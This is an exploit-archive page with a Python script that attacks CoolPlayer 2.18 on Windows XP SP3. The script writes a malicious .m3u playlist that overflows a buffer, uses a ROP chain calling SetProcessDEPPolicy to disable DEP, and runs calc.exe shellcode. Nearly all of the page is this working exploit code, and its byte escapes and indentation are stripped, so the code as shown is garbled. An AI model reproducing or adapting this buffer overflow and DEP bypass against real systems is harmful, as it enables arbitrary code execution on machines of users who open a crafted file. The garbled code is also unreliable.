Home / os / win7

CoolPlayer 2.18 DEP Bypass

Posted on 04 January 2011

# Exploit Title: CoolPlayer 2.18 DEP Bypass
# Date: January 2, 2011
# Author: Blake
# Version: 2.18
# Tested on: Windows XP SP3 running in Virtualbox
# Uses SetProcessDEPPolicy() to disable DEP for the process
# Thanks to mr_me for the encouragement
# Exploit-DB Notes: May not work on all Win XP SP3 machines

print "
============================"
print "CoolPlayer 2.18 DEP Bypass"
print "Written by Blake"
print "============================
"

# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
shellcode =(
"xdaxdaxd9x74x24xf4xbfxe7x18x22xfbx2bxc9xb1x33"
"x5ex31x7ex17x83xeexfcx03x99x0bxc0x0ex99xc4x8d"
"xf1x61x15xeex78x84x24x3cx1excdx15xf0x54x83x95"
"x7bx38x37x2dx09x95x38x86xa4xc3x77x17x09xccxdb"
"xdbx0bxb0x21x08xecx89xeax5dxedxcex16xadxbfx87"
"x5dx1cx50xa3x23x9dx51x63x28x9dx29x06xeex6ax80"
"x09x3exc2x9fx42xa6x68xc7x72xd7xbdx1bx4ex9exca"
"xe8x24x21x1bx21xc4x10x63xeexfbx9dx6exeex3cx19"
"x91x85x36x5ax2cx9ex8cx21xeax2bx11x81x79x8bxf1"
"x30xadx4ax71x3ex1ax18xddx22x9dxcdx55x5ex16xf0"
"xb9xd7x6cxd7x1dxbcx37x76x07x18x99x87x57xc4x46"
"x22x13xe6x93x54x7ex6cx65xd4x04xc9x65xe6x06x79"
"x0exd7x8dx16x49xe8x47x53xabx19x5ax49x3cx80x0f"
"x30x20x33xfax76x5dxb0x0fx06x9axa8x65x03xe6x6e"
"x95x79x77x1bx99x2ex78x0exfaxb1xeaxd2xd3x54x8b"
"x71x2c")


buffer = "x41" * 220
eip = "x28xb0x9fx7c"                # POP ECX / RETN - SHELL32.DLL 7C9FB028
offset1 = "x42" * 4
nop = "x90" * 10

# put zero in EBX
rop = "xddxadx9ex7c"                # POP EBX / RETN - SHELL32.DLL 7C9EADDD
rop += "xffxffxffxff"               # placed into ebx
rop += "xe1x27xc1x77"               # INC EBX / RETN - MSVCRT.DLL 77C127E1

# set EBP to point to SetProcessDEPPolicy
rop += "x7bxa6x9ex7c"               # POP EBP / RETN - SHELL32.DLL 7C9EA67B
rop += "xa4x22x86x7c"               # address of SetProcessDEPPolicy XP SP3

# set EDI as a pointer to RET (rop nop)
rop += "x47xebx9ex7c"               # POP EDI / RETN - SHELL32.DLL 7C9EEB47
rop += "x08x15x9cx7c"               # RETN - SHELL32.DLL 7C9C1508

# set ESI as a pointer to RET (rop nop)
rop += "x4cx20x9cx7c"               # POP ESI / RETN - SHELL32.DLL 7C9C204C
rop += "x51x20x9cx7c"               # RETN - SHELL32.DLL 7C9C2051

# set ESP to point at nops
rop += "x73x10xa1x7c"               # PUSHAD / RETN - SHELL32.DLL 7CA11073

print "[*] Creating malicious m3u file"
try:
file = open("exploit.m3u","w")
file.write(buffer + eip + offset1 + rop + nop + shellcode)
file.close()
print "[*] File created"
except:
print "[x] Error creating file!"

raw_input("
Press any key to exit...")

 

TOP

Malware :

Exploits :